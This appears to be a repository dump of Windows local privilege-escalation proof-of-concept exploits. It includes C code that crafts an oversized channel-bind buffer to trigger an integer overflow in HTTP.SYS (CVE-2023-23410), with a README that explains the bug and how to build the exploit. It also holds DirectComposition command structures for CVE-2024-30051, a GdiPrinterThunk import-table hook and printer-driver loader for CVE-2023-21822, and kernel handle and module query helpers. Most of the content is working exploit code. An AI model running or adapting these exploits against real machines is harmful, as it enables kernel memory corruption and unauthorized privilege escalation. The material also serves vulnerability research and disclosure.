20 | 21 | ULONG ReturnLength = 0; 22 | HTTPAPI_VERSION HttpApiVersion = HTTPAPI_VERSION_2; 23 | HTTP_CHANNEL_BIND_INFO property; 24 | PHTTP_SERVICE_BINDING_A ptr[0x40]; 25 | 26 | ULONG status = HttpInitialize( 27 | HttpApiVersion, 28 | HTTP_INITIALIZE_SERVER, // Flags 29 | NULL // Reserved 30 | ); 31 | 32 | if (status != NO_ERROR) 33 | { 34 | wprintf(L"HttpInitialize(): failed with %lu \n", status); 35 | return status; 36 | } 37 | 38 | HTTP_SERVER_SESSION_ID sessionId = HTTP_NULL_ID; 39 | status = HttpCreateServerSession(HttpApiVersion, &sessionId, 0); 40 | HANDLE hReqQueue = NULL; 41 | status = HttpCreateRequestQueue(HttpApiVersion, 42 | L"MyQueue", 43 | NULL, 44 | 0, 45 | &hReqQueue); 46 | 47 | /* 48 | Compute params 49 | */ 50 | SIZE_T numberOfServiceNames = 0x40; 51 | 52 | SIZE_T szTotal = 0xffffffe8; 53 | SIZE_T szServiceNameHeader = 0x20; 54 | 
SIZE_T szTotalServiceNameHeaders = szTotal - numberOfServiceNames * szServiceNameHeader; 55 | SIZE_T szServiceName = szTotalServiceNameHeaders / 0x40; 56 | szServiceName = (szServiceName + 7) & ~7; 57 | SIZE_T reminder = (szServiceName + szServiceNameHeader) * 0x40 - szTotal; 58 | 59 | wprintf(L"[?] szTotal = 0x%llx\n", szTotal); 60 | wprintf(L"[?] szServiceNameHeader = 0x%llx\n", szServiceNameHeader); 61 | wprintf(L"[?] szTotalServiceNameHeaders = 0x%llx\n", szTotalServiceNameHeaders); 62 | wprintf(L"[?] szServiceName = 0x%llx\n", szServiceName); 63 | wprintf(L"[?] reminder = 0x%llx\n", reminder); 64 | 65 | /* 66 | Craft buffer 67 | */ 68 | unsigned char* buf = (unsigned char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, szTotal); 69 | 70 | for (size_t i = 0; i < numberOfServiceNames; i++) { 71 | PHTTP_SERVICE_BINDING_A p = (PHTTP_SERVICE_BINDING_A)&buf[i * (szServiceName + szServiceNameHeader)]; 72 | 73 | p->Base.Type = HttpServiceBindingTypeA; 74 | p->Buffer = (PCHAR) & buf[i * (szServiceName + szServiceNameHeader) + szServiceNameHeader]; 75 | p->BufferSize = szServiceName; 76 | 77 | ptr[i] = p; 78 | 79 | wprintf(L"[?] sn.buf = 0x%llx\n", p->Buffer); 80 | wprintf(L"[?] sn.szbuf = 0x%llx\n", p->BufferSize); 81 | wprintf(L"[?] 
sn[i] = 0x%llx\n", ptr[i]); 82 | } 83 | 84 | property.Hardening = HttpAuthenticationHardeningStrict; 85 | property.Flags = HTTP_CHANNEL_BIND_DOTLESS_SERVICE; 86 | property.NumberOfServiceNames = numberOfServiceNames; 87 | property.ServiceNames = (PHTTP_SERVICE_BINDING_BASE*)&ptr; 88 | 89 | status = HttpSetServerSessionProperty(sessionId, HttpServerChannelBindProperty, &property, sizeof(HTTP_CHANNEL_BIND_INFO)); 90 | if (status != NOERROR) { 91 | wprintf(L"HttpSetServerSessionProperty failed with %lu \n", status); 92 | return -2; 93 | } 94 | 95 | unsigned char out[0x820]; 96 | status = HttpQueryServerSessionProperty(sessionId, HttpServerChannelBindProperty, &out, sizeof(out), &ReturnLength); 97 | if (status != NOERROR) { 98 | wprintf(L"HttpQueryServerSessionProperty failed with %lu \n", status); 99 | return -3; 100 | } 101 | } 102 | -------------------------------------------------------------------------------- /cve-2023-23410/README.md: -------------------------------------------------------------------------------- 1 | 2 | # CVE-2023-23410 HTTP.SYS EoP 3 | 4 | > At least 4 GB of memory is required to run the PoC 5 | 6 | An integer overflow can be triggered in **UlpComputeChannelBindConfigSize**, which can lead to memory corruption in **UlCopyChannelBindConfigToIrp**. The patch introduced a new check on the size of each *ServiceName*; that check prevents the size from being greater than **0xFFFC**. 7 | 8 | The new check was placed in **UlCaptureChannelBindConfig**. 9 | ![printscreen of introduced check](img/1.png) 10 | 11 | That function can be reached through the following user-mode **APIs** from **httpapi.dll**:
12 | 13 | - [HttpSetServerSessionProperty](https://learn.microsoft.com/en-us/windows/win32/api/http/nf-http-httpsetserversessionproperty) 14 | - [HttpSetUrlGroupProperty](https://learn.microsoft.com/en-us/windows/win32/api/http/nf-http-httpseturlgroupproperty) 15 | - [HttpSendHttpResponse](https://learn.microsoft.com/en-us/windows/win32/api/http/nf-http-httpsendhttpresponse) 16 | 17 | Memory layout of the structures involved: 18 | ![memorylayout](img/2.png) 19 | 20 | **UlpComputeChannelBindConfigSize** computes the total amount of memory required for the whole *ChannelBindConfig* structure. A crafted sequence of *ServiceName* structures can overflow the **resultSize** variable. 21 | 22 | ![printscreen of UlpComputeChannelBindConfigSize code](img/3.png) 23 | 24 | A few more checks have to be taken into account: 25 | 26 | - A check in **UlpAddServiceNameToContainer** prevents the size from being greater than or equal to **0xffffffe8**. 27 | 28 | ![printscreen of UlpComputeChannelBindConfigSize code](img/4.png) 29 | 30 | - The size of each ServiceName must be aligned to 8. 31 | 32 | ## Stack Trace 33 | 34 | ![printscreen of stack trace](img/5.jpg) 35 | 36 | ## Build 37 | 38 | ```shell 39 | cd cve-2023-23410 40 | cmake -S . -B build 41 | cmake --build build --config Release 42 | ``` 43 | 44 | ## Machine systeminfo 45 | 46 | ```shell 47 | Host Name: DESKTOP-19NG2CS 48 | OS Name: Microsoft Windows 10 Education 49 | OS Version: 10.0.19045 N/A Build 19045 50 | OS Manufacturer: Microsoft Corporation 51 | OS Configuration: Standalone Workstation 52 | OS Build Type: Multiprocessor Free 53 | Registered Owner: Windows User 54 | Registered Organization: 55 | Product ID: 00328-00000-00000-AA110 56 | Original Install Date: 27/03/2023, 14:36:49 57 | System Boot Time: 10/05/2023, 19:57:35 58 | System Manufacturer: VMware, Inc. 59 | System Model: VMware7,1 60 | System Type: x64-based PC 61 | Processor(s): 1 Processor(s) Installed. 
62 | [01]: Intel64 Family 6 Model 165 Stepping 5 GenuineIntel ~3792 Mhz 63 | BIOS Version: VMware, Inc. VMW71.00V.16722896.B64.2008100651, 10/08/2020 64 | Windows Directory: C:\Windows 65 | System Directory: C:\Windows\system32 66 | Boot Device: \Device\HarddiskVolume1 67 | System Locale: en-gb;English (United Kingdom) 68 | Input Locale: en-gb;English (United Kingdom) 69 | Time Zone: (UTC+03:00) Kuwait, Riyadh 70 | Total Physical Memory: 4,095 MB 71 | Available Physical Memory: 1,666 MB 72 | Virtual Memory: Max Size: 8,191 MB 73 | Virtual Memory: Available: 6,180 MB 74 | Virtual Memory: In Use: 2,011 MB 75 | Page File Location(s): C:\pagefile.sys 76 | Domain: WORKGROUP 77 | Logon Server: \\DESKTOP-19NG2CS 78 | Hotfix(s): 6 Hotfix(s) Installed. 79 | [01]: KB5017022 80 | [02]: KB5015684 81 | [03]: KB5022834 82 | [04]: KB5014032 83 | [05]: KB5016705 84 | [06]: KB5020372 85 | Network Card(s): 1 NIC(s) Installed. 86 | [01]: Bluetooth Device (Personal Area Network) 87 | Connection Name: Bluetooth Network Connection 88 | Status: Media disconnected 89 | Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. 
90 | ```
91 |
--------------------------------------------------------------------------------
/cve-2024-30051/src/dcomp.h:
--------------------------------------------------------------------------------
     // Declarations for a small wrapper that builds command records in a memory
     // stream and submits them through the NtDComposition* entry points that
     // dcomp.cpp calls via ponylib::win32u.
1 | #ifndef DCOMP_H_
2 | #define DCOMP_H_
3 |
4 | #include
5 |
6 | #include "ponylib/win32u.h"
7 | #include "ponylib/memory.h"
8 | #include "ponylib/nt.h"
9 |
     // Numeric command id; dcomp.cpp stores it in the leading `Id` field of every
     // record below before appending the record to the stream.
10 | enum class dcomp_command_id_t: UINT32 {
11 |     ProcessCommandBufferIterator=0,
12 |     CreateResource=1,
13 |     OpenSharedResource=2,
14 |     ReleaseResource=3,
15 |     GetAnimationTime=4,
16 |     CapturePointer=5,
17 |     OpenSharedResourceHandle=6,
18 |     SetResourceCallbackId=7,
19 |     SetResourceIntegerProperty=8,
20 |     SetResourceFloatProperty=9,
21 |     SetResourceHandleProperty=10,
22 |     SetResourceHandleArrayProperty=11,
23 |     SetResourceBufferProperty=12,
24 |     SetResourceReferenceProperty=13,
25 |     SetResourceReferenceArrayProperty=14,
26 |     SetResourceAnimationProperty=15,
27 |     SetResourceDeletedNotificationTag=16,
28 |     AddVisualChild=17,
29 |     RedirectMouseToHwnd=18,
30 |     SetVisualInputSink=19,
31 |     RemoveVisualChild=20
32 | };
33 |
     // Records are packed to 1 byte, so the structs carry no compiler padding.
     // NOTE(review): field names and widths look like the author's own reading of
     // the format (see the Unknown_* members); treat them as unconfirmed.
34 | #pragma pack(push, 1)
35 | struct dcomp_command_t {
36 |     UINT32 Id;
37 | };
38 | struct dcomp_command_create_resource_t {
39 |     UINT32 Id;
40 |     UINT32 Index;
41 |     UINT32 TypeId;
42 |     UINT32 Shared;
43 | };
44 | struct dcomp_command_open_shared_resource_t {
45 |     UINT32 Id;
46 |     UINT32 Index;
47 |     UINT64 Handle;
48 |     UINT32 TypeId;
49 |     UINT32 Reserved1;
50 | };
51 | struct dcomp_command_release_resource_t {
52 |     UINT32 Id;
53 |     UINT32 Index;
54 | };
55 | struct dcomp_command_get_animation_time_t {
56 |     UINT32 Id;
57 |     UINT32 Index;
58 |     UINT64 Previous;
59 |     UINT64 Delta;
60 | };
61 | struct dcomp_command_capture_pointer_t {
62 |     UINT32 Id;
63 |     UINT32 Index;
64 |     UINT32 Unknown_0_1;
65 |     UINT32 PointerId;
66 |     UINT64 Unknown_Stored_Value;
67 | };
68 | struct dcomp_command_open_shared_resource_handle_t {
69 |     UINT32 Id;
70 |     UINT32 Index;
71 |     UINT64 Unknown;
72 | };
73 | struct dcomp_command_set_resource_callback_id_t {
74 |     UINT32 Id;
75 |     UINT32 Index;
76 |     UINT32 CallbackId;
77 | };
78 | struct dcomp_command_set_resource_integer_property_t {
79 |     UINT32 Id;
80 |     UINT32 Index;
81 |     UINT64 PropertyId;
82 |     UINT64 PropertyValue;
83 | };
84 | struct dcomp_command_set_resource_float_property_t {
85 |     UINT32 Id;
86 |     UINT32 Index;
87 |     UINT32 PropertyId;
88 |     FLOAT PropertyValue;
89 | };
90 | struct dcomp_command_set_resource_handle_property_t {
91 |     UINT32 Id;
92 |     UINT32 Index;
93 |     UINT64 PropertyId;
94 |     UINT64 PropertyValue;
95 | };
     // The three *_array / buffer records end in a one-element array that stands
     // for a variable-length tail of `ArraySize` elements.
96 | struct dcomp_command_set_resource_handle_array_property_t {
97 |     UINT32 Id;
98 |     UINT32 Index;
99 |     UINT32 PropertyId;
100 |     UINT32 ArraySize;
101 |     UINT64 Array[1];
102 | };
103 | struct dcomp_command_set_resource_buffer_property_t {
104 |     UINT32 Id;
105 |     UINT32 Index;
106 |     UINT32 PropertyId;
107 |     UINT32 ArraySize;
108 |     UINT8 Array[1];
109 | };
110 | struct dcomp_command_set_resource_reference_property_t {
111 |     UINT32 Id;
112 |     UINT32 Index;
113 |     UINT32 PropertyId;
114 |     UINT32 PropertyValue;
115 | };
116 | struct dcomp_command_set_resource_reference_array_property_t {
117 |     UINT32 Id;
118 |     UINT32 Index;
119 |     UINT32 PropertyId;
120 |     UINT32 ArraySize;
121 |     UINT32 Array[1];
122 | };
123 | struct dcomp_command_add_visual_child_t {
124 |     UINT32 Id;
125 |     UINT32 Index;
126 |     UINT32 IndexChild;
127 |     UINT32 Mode;
128 |     UINT32 AdditionalIndex;
129 | };
130 | #pragma pack(pop)
131 |
      // Owns one channel handle (m_hch) plus the buffer mapped for it
      // (m_mapped / m_size) and a stream positioned over that buffer.
      // NOTE(review): a destructor is declared but copy construction/assignment
      // are not deleted, so a copied object would refer to the same handle.
132 | class dcomp_channel_t {
133 | protected:
134 |     HANDLE m_hch = NULL;
135 |     SIZE_T m_size = NULL;
136 |     PVOID m_mapped = NULL;
137 |
138 |     ponylib::memory::memory_stream_t m_stream;
139 |
          // m_ctr feeds nextIndex(); m_error holds the last failing NTSTATUS.
          // Neither has a default initialiser here.
140 |     int m_ctr;
141 |     int m_error;
142 |
143 | public:
144 |     dcomp_channel_t(SIZE_T size);
145 |     ~dcomp_channel_t();
146 |
          // True while m_error is a success NTSTATUS.
147 |     bool ok() const {
148 |         return NT_SUCCESS(m_error);
149 |     };
150 |
151 |     int error() const {
152 |         return m_error;
153 |     }
154 |
155 |     HANDLE hch() const {
156 |         return m_hch;
157 |     }
158 |
          // Returns the current counter value and then increments it.
159 |     int nextIndex() {
160 |         return m_ctr++;
161 |     }
162 |
          // Each of the following appends one record to m_stream (see dcomp.cpp);
          // nothing is submitted until process(), commit() or apply() is called.
163 |     bool createResource( UINT32 dwTypeId, UINT32 dwIndex, UINT32 dwShared);
164 |     bool openSharedResource( UINT32 dwIndex, UINT64 dwHandle, UINT32 dwTypeId, UINT32 dwReserved1);
165 |     bool setIntegerProperty( UINT32 dwIndex, UINT64 dqPropertyId, UINT64 dqPropertyValue);
166 |     bool setFloatProperty( UINT32 dwIndex, UINT32 dwPropertyId, FLOAT dwPropertyValue);
167 |     bool setReferenceProperty( UINT32 dwIndex, UINT32 dwPropertyId, UINT32 dwPropertyValue);
168 |     bool setBufferProperty( UINT32 dwIndex, UINT32 dqPropertyId, PVOID buffer, SIZE_T size);
169 |     bool setReferenceArrayProperty( UINT32 dwIndex, UINT32 dqPropertyId, UINT32 dwIndice[], SIZE_T szIndices);
170 |     bool addVisualChild( UINT32 dwIndex, UINT32 dwIndexChild, UINT32 dwMode, UINT32 dwAdditionalIndex);
171 |     bool releaseResource( UINT32 dwIndex);
172 |
173 |     bool commit();
174 |     bool process();
175 |     bool apply();
176 | };
177 |
      // A resource on a channel together with a section handle and a local view
      // of that section.
      // NOTE(review): m_hSection has no default initialiser and is not listed in
      // the constructor's initialiser list in dcomp.cpp, so handle() is
      // indeterminate when construction stopped early; check ok() first.
178 | class dcomp_shared_section_t {
179 | protected:
180 |     HANDLE m_hSection;
181 |     PVOID m_pMapped;
182 |     SIZE_T m_size;
183 |     UINT32 m_index;
184 |     UINT32 m_typeId;
185 |
          // Non-owning pointer to the channel used for every command.
186 |     dcomp_channel_t* m_ch;
187 |
188 |     int m_error = 0;
189 | public:
190 |     dcomp_shared_section_t( dcomp_channel_t* pch, UINT32 dwIndex, UINT32 dwTypeId, SIZE_T size );
191 |     ~dcomp_shared_section_t();
192 |
193 |     bool ok() const {
194 |         return NT_SUCCESS(m_error);
195 |     };
196 |
197 |     int error() const {
198 |         return m_error;
199 |     }
200 |
201 |     PVOID base() const {
202 |         return m_pMapped;
203 |     };
204 |     SIZE_T size() const {
205 |         return m_size;
206 |     };
207 |     HANDLE handle() const {
208 |         return m_hSection;
209 |     };
210 |     UINT32 index() const {
211 |         return m_index;
212 |     };
213 |     UINT32 typeId() const {
214 |         return m_typeId;
215 |     }
216 | };
217 |
218 | #endif // DCOMP_H_
--------------------------------------------------------------------------------
/cve-2023-21822/umpd.cpp:
--------------------------------------------------------------------------------
     // In-process import-table hook for gdi32!GdiPrinterThunk as imported by
     // user32.dll, with per-type "before"/"after" callbacks (see
     // umpd_set_gdi_hooks and umpd_gdi_think_hook below).
1 | #include "umpd.h"
2 |
3 | #include
4 |
5 | #define NUMBER_UMPD_OF_CALLBACKS 256
6 |
     // Hook state: the saved original function, the address of the patched
     // import slot, and one callback pair plus a "call original" flag per type.
7 | typedef struct _UMPD_GDI_HOOK_INFO {
8 |     FuncTy_GdiPrinterThunk_ pfnOrig;
9 |
10 |     PULONG64 ptrOrigMem;
11 |
12 |     FuncTy_GdiPrinterThunk_ pfnUmpdCallbackBefore[NUMBER_UMPD_OF_CALLBACKS] = {0};
13 |     FuncTy_GdiPrinterThunk_ pfnUmpdCallbackAfter[NUMBER_UMPD_OF_CALLBACKS] = {0};
14 |
          // NOTE(review): `= {TRUE}` sets only element 0; the remaining entries
          // start as 0 until umpd_set_gdi_hooks() overwrites the table.
15 |     BOOL bCallOrigTable[NUMBER_UMPD_OF_CALLBACKS] = {TRUE};
16 |
17 | } UMPD_GDI_HOOK_INFO,*PUMPD_GDI_HOOK_INFO;
18 |
19 | static UMPD_GDI_HOOK_INFO g_umpd_hook_info;
20 |
21 |
     // Replaces one import-address-table slot of hModule.
     //   hModule       module whose import table is walked
     //   hModuleTarget module the wanted import comes from
     //   pfnTarget     address of the imported function to look for
     //   pfnHook       value written into the matching slot
     //   pfnOrig       out: previous slot value
     //   ptrOrig       out: address of the slot
     // Returns TRUE when a slot was found and rewritten.
     // NOTE(review): the PE headers are dereferenced without checking the DOS/NT
     // signatures or the import directory size, and the 64-bit optional header
     // and thunk types are used unconditionally.
     // NOTE(defender): after this runs the slot no longer equals the address the
     // target module exports, which an import-table integrity check can spot.
22 | BOOL util_hook_iat_in_module(
23 |     HMODULE hModule,
24 |     HMODULE hModuleTarget,
25 |     FARPROC pfnTarget,
26 |     ULONG64 pfnHook,
27 |     ULONG64& pfnOrig,
28 |     PULONG64& ptrOrig
29 | ) {
30 |
31 |     PBYTE base = (PBYTE)hModule;
32 |
33 |     PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)(hModule);
34 |     PIMAGE_NT_HEADERS fh = (PIMAGE_NT_HEADERS)(base + dos->e_lfanew);
35 |     IMAGE_OPTIONAL_HEADER64 opt = fh->OptionalHeader;
36 |     IMAGE_DATA_DIRECTORY dir = opt.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
37 |     PIMAGE_IMPORT_DESCRIPTOR descs = (PIMAGE_IMPORT_DESCRIPTOR)(dir.VirtualAddress + base);
38 |
39 |     BOOL bFound = FALSE;
40 |     int i = 0;
41 |
42 |     while (descs[i].Characteristics != 0) {
43 |         PIMAGE_IMPORT_DESCRIPTOR importDesc = &descs[i];
44 |
              // Each imported library is loaded by name only to compare module
              // handles; the extra references are never released in this function.
45 |         HMODULE hImportedLib = LoadLibraryA(
46 |             (char *)(importDesc->Name + base)
47 |         );
48 |         if (hImportedLib != hModuleTarget) {
49 |             i++;
50 |             continue;
51 |         }
52 |
53 |         PIMAGE_THUNK_DATA64 nameTable = (PIMAGE_THUNK_DATA64)(importDesc->OriginalFirstThunk + base);
54 |         PIMAGE_THUNK_DATA64 addrTable = (PIMAGE_THUNK_DATA64)(importDesc->FirstThunk + base);
55 |
56 |         int j = 0;
57 |         while (nameTable[j].u1.AddressOfData != 0 ) {
58 |             PIMAGE_THUNK_DATA64 nameDesc = &nameTable[j];
59 |             PIMAGE_THUNK_DATA64 addrDesc = &addrTable[j];
60 |
                  // Imports by ordinal carry no name and are skipped.
61 |             BOOL bImportedByOrdinal = (nameDesc->u1.Ordinal & IMAGE_ORDINAL_FLAG) == IMAGE_ORDINAL_FLAG;
62 |             if (bImportedByOrdinal) {
63 |                 j++;
64 |                 continue;
65 |             }
66 |
67 |
68 |             PIMAGE_IMPORT_BY_NAME importedFuncName = (PIMAGE_IMPORT_BY_NAME)(nameDesc->u1.AddressOfData + base);
69 |             FARPROC importedFunc = GetProcAddress(hImportedLib, (char*)(&importedFuncName->Name));
70 |
71 |             if (importedFunc != pfnTarget) {
72 |                 j++;
73 |                 continue;
74 |             }
75 |
76 |             ptrOrig = &addrDesc->u1.Function;
77 |             DWORD protectFlags = NULL;
78 |
                  // Make the slot writable, swap the pointer, restore the old
                  // protection. NOTE(review): neither VirtualProtect result is
                  // checked, so a failed first call leads to a write to a page
                  // that may still be read-only.
79 |             VirtualProtect(ptrOrig, sizeof(ULONG64), PAGE_READWRITE, &protectFlags);
80 |             pfnOrig = *ptrOrig;
81 |             *ptrOrig = pfnHook;
82 |             VirtualProtect(ptrOrig, sizeof(ULONG64), protectFlags, &protectFlags);
83 |
84 |             bFound = TRUE;
85 |             break;
86 |         }
87 |
              // Only the first descriptor that resolves to hModuleTarget is searched.
88 |         break;
89 |     }
90 |
91 |     return bFound;
92 | };
93 |
94 |
     // Opens the named printer, asks the spooler for its level-2 driver info and
     // loads the driver DLL named there into the current process.
     // Outputs: hPrinter (open handle), pDriverPath (points into the malloc'd
     // DRIVER_INFO_2W block), hPrinterDLL (module handle).
     // NOTE(review): the sizing call and malloc are unchecked; the failure path
     // closes the printer but does not free driverInfo; hPrinterDLL is not tested
     // and the function returns TRUE even when LoadLibraryExW failed; driverInfo
     // is never freed here (pDriverPath points into it).
     // NOTE(defender): loading the DLL runs its entry point in this process, so
     // the path reported by the spooler is trusted as code.
95 | BOOL umpd_load_printer_dll(LPWSTR printerName, HANDLE& hPrinter, LPWSTR& pDriverPath, HMODULE& hPrinterDLL) {
96 |     hPrinter = NULL;
97 |     pDriverPath = NULL;
98 |
99 |     if (!OpenPrinterW(printerName, &hPrinter, NULL)) {
100 |         return FALSE;
101 |     }
102 |
103 |     DWORD pcbNeeded;
104 |     GetPrinterDriverW(hPrinter, NULL, 2, NULL, 0, &pcbNeeded);
105 |     DRIVER_INFO_2W* driverInfo = (DRIVER_INFO_2W*)malloc(pcbNeeded);
106 |     if (!GetPrinterDriverW(hPrinter, NULL, 2, (LPBYTE)driverInfo, pcbNeeded, &pcbNeeded)) {
107 |         ClosePrinter(hPrinter);
108 |
109 |         return FALSE;
110 |     }
111 |     pDriverPath = driverInfo->pDriverPath;
112 |     hPrinterDLL = LoadLibraryExW(driverInfo->pDriverPath, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
113 |
114 |     return TRUE;
115 | };
116 |
117 |
      // Replacement installed in the import slot. Logs the request header, then
      // runs the "before" callback, the original function (when the flag for this
      // type is set) and the "after" callback; the return value is that of the
      // last one that ran, or TRUE if none did.
      // NOTE(review): ulType is read from the input buffer and used as an index
      // into the 256-entry tables without a range check, and inputBufSize is not
      // compared with the header size before the header is read.
118 | INT umpd_gdi_think_hook(VOID *inputBuf, ULONGLONG inputBufSize, VOID *outputBuffer, ULONGLONG outputBufSize) {
119 |     ptr_My_UMPDTHDR umpdthdr = (ptr_My_UMPDTHDR)inputBuf;
120 |
121 |     wprintf(
122 |         L"[?][umpd_gdi_think_hook] in=%p out=%p szout=%llx cjSize=%x ulType=%d ulReserved1=%x ulReserved2=%x humpd=%llx\n",
123 |         inputBuf,
124 |         outputBuffer,
125 |         outputBufSize,
126 |         umpdthdr->umthdr.cjSize,
127 |         umpdthdr->umthdr.ulType,
128 |         umpdthdr->umthdr.ulReserved1,
129 |         umpdthdr->umthdr.ulReserved2,
130 |         umpdthdr->humpd
131 |     );
132 |
133 |     INT result = TRUE;
134 |
135 |     if (g_umpd_hook_info.pfnUmpdCallbackBefore[umpdthdr->umthdr.ulType]) {
136 |         result = g_umpd_hook_info.pfnUmpdCallbackBefore[umpdthdr->umthdr.ulType](
137 |             inputBuf, inputBufSize, outputBuffer, outputBufSize
138 |         );
139 |     }
140 |
141 |     if (g_umpd_hook_info.bCallOrigTable[umpdthdr->umthdr.ulType]) {
142 |         result = g_umpd_hook_info.pfnOrig(
143 |             inputBuf, inputBufSize, outputBuffer, outputBufSize
144 |         );
145 |     }
146 |
147 |     if (g_umpd_hook_info.pfnUmpdCallbackAfter[umpdthdr->umthdr.ulType]) {
148 |         result = g_umpd_hook_info.pfnUmpdCallbackAfter[umpdthdr->umthdr.ulType](
149 |             inputBuf, inputBufSize, outputBuffer, outputBufSize
150 |         );
151 |     }
152 |
153 |     return result;
154 | }
155 |
      // Installs umpd_gdi_think_hook over user32.dll's import of
      // gdi32!GdiPrinterThunk and marks every type as "call the original".
      // Returns the result of util_hook_iat_in_module.
156 | BOOL umpd_set_gdi_hooks() {
157 |     HMODULE hgdi = LoadLibraryW(L"gdi32.dll");
158 |     HMODULE hu32 = LoadLibraryW(L"user32.dll");
159 |     if (!hgdi || !hu32)
160 |         return FALSE;
161 |
162 |     BOOL status = util_hook_iat_in_module(
163 |         hu32,
164 |         hgdi,
165 |         GetProcAddress(hgdi, "GdiPrinterThunk"),
166 |         (ULONG64)&umpd_gdi_think_hook,
167 |         (ULONG64&)g_umpd_hook_info.pfnOrig,
168 |         g_umpd_hook_info.ptrOrigMem
169 |     );
170 |
          // NOTE(review): memset fills bytes, so each BOOL becomes 0x01010101:
          // non-zero (truthy) but not equal to TRUE. The table is also filled
          // after the slot has been patched, and the literal 256 duplicates
          // NUMBER_UMPD_OF_CALLBACKS.
171 |     memset(&g_umpd_hook_info.bCallOrigTable, TRUE, 256 * sizeof(BOOL));
172 |     return status;
173 | };
174 |
      // Registers cb for request type `index`, either as the "before" or the
      // "after" callback, and sets whether the original is still called.
      // NOTE(review): index is not checked against NUMBER_UMPD_OF_CALLBACKS.
175 | VOID umpd_set_cb(INT index, FuncTy_GdiPrinterThunk_ cb, BOOL bBefore, BOOL bCallOrig) {
176 |     if (bBefore)
177 |         g_umpd_hook_info.pfnUmpdCallbackBefore[index] = cb;
178 |     else
179 |         g_umpd_hook_info.pfnUmpdCallbackAfter[index] = cb;
180 |
181 |     g_umpd_hook_info.bCallOrigTable[index] = bCallOrig;
182 | }
--------------------------------------------------------------------------------
/cve-2023-21822/nt.h:
--------------------------------------------------------------------------------
     // Helpers around NtQuerySystemInformation for the handle and module
     // information classes.
     // NOTE(review): this header defines a global variable and non-inline
     // functions, so including it from more than one translation unit would
     // produce duplicate definitions.
1 | #ifndef _NTHELPER
2 | #define _NTHELPER
3 |
4 | #include
5 | #include
6 |
7 | #define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
8 |
     // Local copy of the information-class numbering. Values are implicit from
     // position (MySystemModuleInformation is 11); only the last one is explicit.
9 | typedef enum _My_SYSTEM_INFORMATION_CLASS {
10 |     MySystemBasicInformation,
11 |     MySystemProcessorInformation,
12 |     MySystemPerformanceInformation,
13 |     MySystemTimeOfDayInformation,
14 |     MySystemPathInformation,
15 |     MySystemProcessInformation,
16 |     MySystemCallCountInformation,
17 |     MySystemDeviceInformation,
18 |     MySystemProcessorPerformanceInformation,
19 |     MySystemFlagsInformation,
20 |     MySystemCallTimeInformation,
21 |     MySystemModuleInformation,
22 |     MySystemLocksInformation,
23 |     MySystemStackTraceInformation,
24 |     MySystemPagedPoolInformation,
25 |     MySystemNonPagedPoolInformation,
26 |     MySystemHandleInformation,
27 |     MySystemObjectInformation,
28 |     MySystemPageFileInformation,
29 |     MySystemVdmInstemulInformation,
30 |     MySystemVdmBopInformation,
31 |     MySystemFileCacheInformation,
32 |     MySystemPoolTagInformation,
33 |     MySystemInterruptInformation,
34 |     MySystemDpcBehaviorInformation,
35 |     MySystemFullMemoryInformation,
36 |     MySystemLoadGdiDriverInformation,
37 |     MySystemUnloadGdiDriverInformation,
38 |     MySystemTimeAdjustmentInformation,
39 |     MySystemSummaryMemoryInformation,
40 |     MySystemNextEventIdInformation,
41 |     MySystemEventIdsInformation,
42 |     MySystemCrashDumpInformation,
43 |     MySystemExceptionInformation,
44 |     MySystemCrashDumpStateInformation,
45 |     MySystemKernelDebuggerInformation,
46 |     MySystemContextSwitchInformation,
47 |     MySystemRegistryQuotaInformation,
48 |     MySystemExtendServiceTableInformation,
49 |     MySystemPrioritySeperation,
50 |     MySystemPlugPlayBusInformation,
51 |     MySystemDockInformation,
52 |     MySystemPowerInformation,
53 |     MySystemProcessorSpeedInformation,
54 |     MySystemCurrentTimeZoneInformation,
55 |     MySystemLookasideInformation,
56 |     MySystemExtendedHandleInformation = 64
57 | } My_SYSTEM_INFORMATION_CLASS, *ptr_My_SYSTEM_INFORMATION_CLASS;
58 |
59 | #define MAXIMUM_FILENAME_LENGTH 255
60 |
     // One loaded-module record: image base, size, flags and name.
61 | typedef struct _My_SYSTEM_MODULE {
62 |     ULONG Reserved1;
63 |     ULONG Reserved2;
64 | #ifdef _WIN64
65 |     ULONG Reserved3;
66 | #endif
67 |     PVOID ImageBaseAddress;
68 |     ULONG ImageSize;
69 |     ULONG Flags;
70 |     WORD Id;
71 |     WORD Rank;
72 |     WORD w018;
73 |     WORD NameOffset;
74 |     CHAR Name[MAXIMUM_FILENAME_LENGTH];
75 | }My_SYSTEM_MODULE, *ptr_My_SYSTEM_MODULE;
76 |
     // Count followed by a variable-length array of module records.
77 | typedef struct _My_SYSTEM_MODULE_INFORMATION {
78 |     ULONG ModulesCount;
79 |     My_SYSTEM_MODULE Modules[1];
80 | } My_SYSTEM_MODULE_INFORMATION, *ptr_My_SYSTEM_MODULE_INFORMATION;
81 |
     // One handle-table record; `Object` is a pointer-sized object address.
82 | typedef struct _My_SYSTEM_HANDLE
83 | {
84 |     PVOID Object;
85 |     HANDLE UniqueProcessId;
86 |     HANDLE HandleValue;
87 |     ULONG GrantedAccess;
88 |     USHORT CreatorBackTraceIndex;
89 |     USHORT ObjectTypeIndex;
90 |     ULONG HandleAttributes;
91 |     ULONG Reserved;
92 | } My_SYSTEM_HANDLE, *ptr_My_SYSTEM_HANDLE;
93 |
     // Count followed by a variable-length array of handle records.
94 | typedef struct _My_SYSTEM_HANDLE_INFORMATION
95 | {
96 |     ULONG_PTR HandleCount;
97 |     ULONG_PTR Reserved;
98 |     My_SYSTEM_HANDLE Handles[1];
99 | } My_SYSTEM_HANDLE_INFORMATION, *ptr_My_SYSTEM_HANDLE_INFORMATION;
100 |
      // SYSTEM_INFORMATION_CLASS is not declared in this header; presumably it
      // comes from one of the includes above — TODO confirm.
101 | typedef NTSTATUS (NTAPI* FuncTy_NtQuerySystemInformation) (
102 |     SYSTEM_INFORMATION_CLASS SystemInformationClass,
103 |     PVOID SystemInformation,
104 |     ULONG SystemInformationLength,
105 |     ULONG *ReturnLength
106 | );
107 | FuncTy_NtQuerySystemInformation g_pfnNtQuerySystemInformation = NULL;
108 |
      // Resolves ntdll!NtQuerySystemInformation on first use, caches the pointer
      // in g_pfnNtQuerySystemInformation and forwards the call.
